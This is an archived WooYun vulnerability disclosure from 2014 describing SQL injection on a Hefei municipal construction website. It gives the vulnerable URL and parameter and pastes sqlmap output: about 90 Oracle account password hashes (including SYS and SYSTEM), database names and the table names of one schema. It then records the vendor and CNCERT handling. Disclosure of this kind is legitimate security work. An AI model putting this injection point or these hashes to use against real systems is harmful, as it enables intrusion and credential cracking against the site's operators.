乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-10: 细节已通知厂商并且等待厂商处理中 2014-06-14: 厂商已经确认,细节仅向厂商公开 2014-06-24: 细节向核心白帽子及相关领域专家公开 2014-07-04: 细节向普通白帽子公开 2014-07-14: 细节向实习白帽子公开 2014-07-25: 细节向公众公开
合肥建设网部分页面获取参数过滤不严格,导致SQL注入的发生。
注入地址:http://www.hfjs.gov.cn/searchCenter/compBaseInfo.jsp?item_id=0701&comp_id=A08009101417613178
数据库账户:
web application technology: JSPback-end DBMS: Oracle[15:30:34] [INFO] fetching database users password hashes[15:30:34] [INFO] the SQL query used returns 90 entriesdo you want to store hashes to a temporary file for eventual further processingwith other tools [y/N] ndo you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] ndatabase management system users password hashes:[*] _NEXT_USER [1]: password hash: NULL[*] ADM_PARALLEL_EXECUTE_TASK [1]: password hash: NULL[*] ANONYMOUS [1]: password hash: anonymous[*] APEX_030200 [1]: password hash: 15DB5BD1BE83CBD4[*] APEX_ADMINISTRATOR_ROLE [1]: password hash: NULL[*] APEX_PUBLIC_USER [1]: password hash: 28B883CF236D8845[*] APPQOSSYS [1]: password hash: 519D632B7EE7F63A[*] AQ_ADMINISTRATOR_ROLE [1]: password hash: NULL[*] AQ_USER_ROLE [1]: password hash: NULL[*] AUTHENTICATEDUSER [1]: password hash: NULL[*] CONNECT [1]: password hash: NULL[*] CSW_USR_ROLE [1]: password hash: F79FD2B778DEA3AA[*] CTXAPP [1]: password hash: NULL[*] CTXSYS [1]: password hash: 77E39FD80D6CEC88[*] CWM_USER [1]: password hash: NULL[*] DATAPUMP_EXP_FULL_DATABASE [1]: password hash: NULL[*] DATAPUMP_IMP_FULL_DATABASE [1]: password hash: NULL[*] DBA [1]: password hash: NULL[*] DBFS_ROLE [1]: password hash: NULL[*] DBSNMP [1]: password hash: F22EC051A69B015B[*] DELETE_CATALOG_ROLE [1]: password hash: NULL[*] DIP [1]: password hash: CE4A36B8E06CA59C[*] EJBCLIENT [1]: password hash: NULL[*] EXECUTE_CATALOG_ROLE [1]: password hash: NULL[*] EXFSYS [1]: password hash: 33C758A8E388DEE5[*] EXP_FULL_DATABASE [1]: password hash: NULL[*] FLOWS_FILES [1]: password hash: D8204E627231C120[*] GATHER_SYSTEM_STATISTICS [1]: password hash: NULL[*] GLOBAL_AQ_USER_ROLE [1]: password hash: GLOBAL[*] HS_ADMIN_EXECUTE_ROLE [1]: password hash: NULL[*] HS_ADMIN_ROLE [1]: password hash: NULL[*] HS_ADMIN_SELECT_ROLE [1]: password hash: NULL[*] IMP_FULL_DATABASE [1]: password hash: NULL[*] JAVA_ADMIN [1]: password hash: NULL[*] JAVA_DEPLOY [1]: password hash: NULL[*] JAVADEBUGPRIV [1]: password hash: NULL[*] JAVAIDPRIV [1]: password hash: NULL[*] JAVASYSPRIV [1]: password hash: NULL[*] JAVAUSERPRIV [1]: password hash: NULL[*] JMXSERVER [1]: password hash: NULL[*] JW [1]: password hash: 6839503CBE1EF8E6[*] LOGSTDBY_ADMINISTRATOR [1]: password hash: NULL[*] MDDATA [1]: password hash: DF02A496267DEE66[*] MDSYS [1]: password hash: 72979A94BAD2AF80[*] MGMT_USER [1]: password hash: NULL[*] MGMT_VIEW [1]: password hash: 16B1E0A4A6485A33[*] OEM_ADVISOR [1]: password hash: NULL[*] OEM_MONITOR [1]: password hash: NULL[*] OLAP_DBA [1]: password hash: NULL[*] OLAP_USER [1]: password hash: NULL[*] OLAP_XS_ADMIN [1]: password hash: NULL[*] OLAPI_TRACE_USER [1]: password hash: NULL[*] OLAPSYS [1]: password hash: 4AC23CC3B15E2208[*] ORACLE_OCM [1]: password hash: 5A2E026A9157958C[*] ORDADMIN [1]: password hash: NULL[*] ORDDATA [1]: password hash: A93EC937FCD1DC2A[*] ORDPLUGINS [1]: password hash: 88A2B2C183431F00[*] ORDSYS [1]: password hash: 7EFA02EC7EA6B86F[*] OUTLN [1]: password hash: 4A3BA55E08595C81[*] OWB$CLIENT [1]: password hash: 13D492A4459DFE0D[*] OWB_DESIGNCENTER_VIEW [1]: password hash: NULL[*] OWB_USER [1]: password hash: NULL[*] OWBSYS [1]: password hash: 610A3C38F301776F[*] OWBSYS_AUDIT [1]: password hash: FD8C3D14F6B60015[*] PUBLIC [1]: password hash: NULL[*] RECOVERY_CATALOG_OWNER [1]: password hash: NULL[*] RESOURCE [1]: password hash: NULL[*] SCHEDULER_ADMIN [1]: password hash: NULL[*] SCOTT [1]: password hash: F894844C34402B67[*] SELECT_CATALOG_ROLE [1]: password hash: NULL[*] SF_DB_CENTER [1]: password hash: 99AE6949CAA831C4[*] SI_INFORMTN_SCHEMA [1]: password hash: 84B8CBCA4D477FA3[*] SPATIAL_CSW_ADMIN [1]: password hash: 093913703800E437[*] SPATIAL_CSW_ADMIN_USR [1]: password hash: 1B290858DD14107E[*] SPATIAL_WFS_ADMIN [1]: password hash: NULL[*] SPATIAL_WFS_ADMIN_USR [1]: password hash: 7117215D6BEE6E82[*] SYS [1]: password hash: 6A5DA01414149500[*] SYSMAN [1]: password hash: 2C096EBDBCD0688E[*] SYSTEM [1]: password hash: EDA426697BD946F9[*] TEST [1]: password hash: 7A0F2B316C212D67[*] WFS_USR_ROLE [1]: password hash: 094C14AA84362687[*] WM_ADMIN_ROLE [1]: password hash: NULL[*] WMSYS [1]: password hash: 7C9BA362F8314299[*] XDB [1]: password hash: 88D8364765FCE6AF[*] XDB_SET_INVOKER [1]: password hash: NULL[*] XDB_WEBSERVICES [1]: password hash: NULL[*] XDB_WEBSERVICES_OVER_HTTP [1]: password hash: NULL[*] XDB_WEBSERVICES_WITH_PUBLIC [1]: password hash: NULL[*] XDBADMIN [1]: password hash: NULL[*] XS$NULL [1]: password hash: DC4FCC8CB69A6733
数据库:
available databases [20]:[*] APEX_030200[*] APPQOSSYS[*] CTXSYS[*] DBSNMP[*] EXFSYS[*] FLOWS_FILES[*] JW[*] MDSYS[*] OLAPSYS[*] ORDDATA[*] ORDSYS[*] OUTLN[*] OWBSYS[*] SCOTT[*] SF_DB_CENTER[*] SYS[*] SYSMAN[*] SYSTEM[*] WMSYS[*] XDB
库JW中表:
Database: JW[42 tables]+------------------------+| JW_AUDIT_FLOW || JW_AUDIT_PRIVILEGE || JW_AUDIT_RESULT || JW_BASE_ARTICLE || JW_BASE_ARTICLEBAK || JW_BASE_DEPTINFO || JW_BASE_LINK || JW_BASE_LIST || JW_BASE_NOTICE || JW_BASE_PORALCOUNT || JW_BASE_SUBTITLE || JW_BASE_USERINFO || JW_BASE_WEBITEM || JW_BASE_WEBITEMARTICLE || JW_EXPEINTER_BODY || JW_EXPEINTER_HEAD || JW_HDCENTER_MANAGER || JW_HD_ITEM || JW_LIST_ARTICLE || JW_MAGAZINE_BODY || JW_MAGAZINE_HEAD || JW_MAGAZINE_ITEM || JW_MESSAGE_DELETE || JW_MESSAGE_FILE || JW_NOTICE_AUDIT || JW_NOTICE_AUDIT_RESULT || JW_NOTICE_VIEW || JW_ONLINE_CONTRIBUTE || JW_ONLINE_MESSAGE || JW_ONLINE_REFER || JW_PRIVILEGE_ITEM || JW_PRIVILEGE_ROLES || JW_RELEASE_ANNEX || JW_RELEASE_REVIEW || JW_SETTYPE_BODY || JW_SETTYPE_HEAD || JW_SURVEY_BODY || JW_SURVEY_HEAD || JW_TEMPLET_APPLY || JW_TEMPLET_INFO || JW_TEMPLET_TYPE || JW_TEMP_GCJSGL |+------------------------+
过滤啊过滤!
危害等级:高
漏洞Rank:11
确认时间:2014-06-14 22:54
CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心处置,由其后续联系网站管理单位。
暂无